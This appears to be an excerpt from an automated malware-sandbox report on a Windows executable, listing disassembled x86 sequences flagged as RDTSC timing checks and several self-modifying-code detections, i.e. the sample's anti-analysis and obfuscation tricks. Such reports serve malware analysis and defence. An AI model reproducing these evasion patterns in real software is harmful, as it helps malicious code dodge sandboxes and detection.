                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E202F9 second address: 4E20312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 mov al, FAh 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20373 second address: 4E20380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 sub ebx, ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov bl, 64h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20380 second address: 4E20384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20384 second address: 4E2038D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E2038D second address: 4E203A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE78B3Ah 0x00000009 popad 0x0000000a popad 0x0000000b sub edi, edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 movsx edi, si 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E203A5 second address: 4E203C7 instructions: 0x00000000 rdtsc 0x00000002 mov si, 1BD5h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx esi, bx 0x0000000b popad 0x0000000c inc ebx 0x0000000d jmp 00007F2ADCE7BD6Dh 0x00000012 test al, al 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E203C7 second address: 4E203CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E203CB second address: 4E203D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E203D1 second address: 4E20406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F2ADCE78CD0h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2ADCE78B47h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E2045E second address: 4E2049D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F2ADCE7BD6Eh 0x0000000f push eax 0x00000010 jmp 00007F2ADCE7BD6Bh 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E2049D second address: 4E204A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E204A3 second address: 4E204A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E204A9 second address: 4E204AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E204AD second address: 4E204B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E204CD second address: 4E204D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E204D3 second address: 4E204E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test eax, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edx, ax 0x00000012 mov ebx, eax 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E204E8 second address: 4E2054A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F2B4DC76ABDh 0x0000000f pushad 0x00000010 mov bl, al 0x00000012 call 00007F2ADCE78B49h 0x00000017 mov di, ax 0x0000001a pop eax 0x0000001b popad 0x0000001c js 00007F2ADCE78B8Bh 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F2ADCE78B46h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E2054A second address: 4E2056D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F2ADCE7BD6Bh 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E2056D second address: 4E20572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20572 second address: 4E20590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 42h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F2B4DC79C87h 0x0000000e pushad 0x0000000f mov ecx, 2E25BEC5h 0x00000014 popad 0x00000015 mov ebx, dword ptr [ebp+08h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20590 second address: 4E205A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E205A8 second address: 4E205D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2ADCE7BD75h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E205D1 second address: 4E2063C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2ADCE78B47h 0x00000008 pop ecx 0x00000009 jmp 00007F2ADCE78B49h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 mov cl, 50h 0x00000015 movsx ebx, ax 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F2ADCE78B3Bh 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ax, bx 0x00000026 call 00007F2ADCE78B47h 0x0000002b pop ecx 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E2063C second address: 4E20665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 mov si, 2B77h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007F2ADCE7BD6Ah 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F2ADCE7BD6Eh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20665 second address: 4E20677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2ADCE78B3Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20677 second address: 4E2067B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E2067B second address: 4E20702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F2ADCE78B47h 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F2ADCE78B46h 0x00000014 push eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F2ADCE78B41h 0x0000001c or eax, 745EE846h 0x00000022 jmp 00007F2ADCE78B41h 0x00000027 popfd 0x00000028 call 00007F2ADCE78B40h 0x0000002d mov ecx, 2389AF01h 0x00000032 pop eax 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov ecx, 2D0A73F5h 0x0000003d mov bx, cx 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20741 second address: 4E20747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20747 second address: 4E2074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E2074B second address: 4E2076E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ebx, 2D342C20h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E2076E second address: 4E20774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20774 second address: 4E20778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20778 second address: 4E20793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20793 second address: 4E2079A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E2079A second address: 4E207A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E207A0 second address: 4E207A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E207A4 second address: 4E20012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F2B4DC769DFh 0x0000000e xor eax, eax 0x00000010 jmp 00007F2ADCE5226Ah 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d xor ebx, ebx 0x0000001f cmp eax, 00000000h 0x00000022 je 00007F2ADCE78C93h 0x00000028 call 00007F2AE17C5FBDh 0x0000002d mov edi, edi 0x0000002f pushad 0x00000030 mov edi, eax 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov edi, 10D52282h 0x0000003c push edi 0x0000003d pop ecx 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20012 second address: 4E20018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20018 second address: 4E2001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E2001C second address: 4E20038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dx, 1D7Eh 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov edi, eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov esi, edx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20038 second address: 4E200B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e call 00007F2ADCE78B49h 0x00000013 mov dx, ax 0x00000016 pop esi 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a pushad 0x0000001b call 00007F2ADCE78B46h 0x00000020 pop ecx 0x00000021 mov ax, bx 0x00000024 popad 0x00000025 push ebx 0x00000026 mov ecx, 6BF3CEB9h 0x0000002b pop esi 0x0000002c popad 0x0000002d xchg eax, ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F2ADCE78B40h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E200B1 second address: 4E200CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], 55534552h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E200CD second address: 4E200D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E200D3 second address: 4E200F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2ADCE7BD79h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E200F0 second address: 4E200F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E2016F second address: 4E2017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2ADCE7BD6Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20B01 second address: 4E20B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20BBE second address: 4E20BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20BC2 second address: 4E20BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20BC8 second address: 4E20C0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2ADCE7BD78h 0x00000008 pop eax 0x00000009 mov edi, 7B3B1AF6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push 1D38BD4Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2ADCE7BD79h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20C0C second address: 4E20C71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 68FE2164h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F2ADCE78B3Ch 0x00000017 or ecx, 3F4EC678h 0x0000001d jmp 00007F2ADCE78B3Bh 0x00000022 popfd 0x00000023 push ecx 0x00000024 mov edi, 13F1249Ah 0x00000029 pop edx 0x0000002a popad 0x0000002b call 00007F2B4DC6DA58h 0x00000030 push 75C12B70h 0x00000035 push dword ptr fs:[00000000h] 0x0000003c mov eax, dword ptr [esp+10h] 0x00000040 mov dword ptr [esp+10h], ebp 0x00000044 lea ebp, dword ptr [esp+10h] 0x00000048 sub esp, eax 0x0000004a push ebx 0x0000004b push esi 0x0000004c push edi 0x0000004d mov eax, dword ptr [75C74538h] 0x00000052 xor dword ptr [ebp-04h], eax 0x00000055 xor eax, ebp 0x00000057 push eax 0x00000058 mov dword ptr [ebp-18h], esp 0x0000005b push dword ptr [ebp-08h] 0x0000005e mov eax, dword ptr [ebp-04h] 0x00000061 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000068 mov dword ptr [ebp-08h], eax 0x0000006b lea eax, dword ptr [ebp-10h] 0x0000006e mov dword ptr fs:[00000000h], eax 0x00000074 ret 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 jmp 00007F2ADCE78B48h 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20C71 second address: 4E20C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20C75 second address: 4E20C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20C7B second address: 4E20C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20D15 second address: 4E20D28 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F2B4DC5C79Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20D28 second address: 4E20D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E20D2C second address: 4E20D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30B64 second address: 4E30B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30B68 second address: 4E30B6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30B6C second address: 4E30B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30B72 second address: 4E30B77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30B77 second address: 4E30B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30B7D second address: 4E30B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test esi, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ebx, 0396BD9Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30B90 second address: 4E30B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30B95 second address: 4E30BD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 725Dh 0x00000007 pushfd 0x00000008 jmp 00007F2ADCE78B3Ah 0x0000000d xor esi, 6FCC72B8h 0x00000013 jmp 00007F2ADCE78B3Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007F2B4DC56331h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F2ADCE78B40h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30BD6 second address: 4E30BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30BDA second address: 4E30BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30BE0 second address: 4E30BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30BE6 second address: 4E30BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30BEA second address: 4E30C7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [75C7459Ch], 05h 0x00000012 jmp 00007F2ADCE7BD70h 0x00000017 je 00007F2B4DC715DEh 0x0000001d jmp 00007F2ADCE7BD70h 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 mov edx, 7CC2CF1Ch 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F2ADCE7BD6Eh 0x00000035 sub ax, 7C38h 0x0000003a jmp 00007F2ADCE7BD6Bh 0x0000003f popfd 0x00000040 mov ax, 026Fh 0x00000044 popad 0x00000045 mov eax, 6703568Bh 0x0000004a popad 0x0000004b xchg eax, esi 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F2ADCE7BD6Dh 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30C7D second address: 4E30C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30CDF second address: 4E30CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2ADCE7BD6Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30CEF second address: 4E30CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30CFE second address: 4E30D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30D02 second address: 4E30D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30D06 second address: 4E30D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30D42 second address: 4E30D65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dh, cl 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSpecial instruction interceptor: First address: 4F7988 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSpecial instruction interceptor: First address: 4F558A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSpecial instruction interceptor: First address: 6C8D9A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSpecial instruction interceptor: First address: 6AAAA0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeSpecial instruction interceptor: First address: 72F428 instructions caused by: Self-modifying code
